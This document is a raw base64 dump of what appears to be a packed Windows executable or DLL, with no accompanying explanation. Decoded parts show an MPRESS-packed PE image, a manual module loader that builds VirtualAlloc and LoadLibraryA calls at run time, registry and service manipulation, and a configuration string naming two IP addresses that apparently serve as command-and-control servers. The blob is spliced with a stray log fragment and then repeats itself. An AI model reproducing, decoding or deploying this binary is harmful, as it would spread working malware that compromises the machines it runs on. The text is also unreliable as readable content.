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") returned="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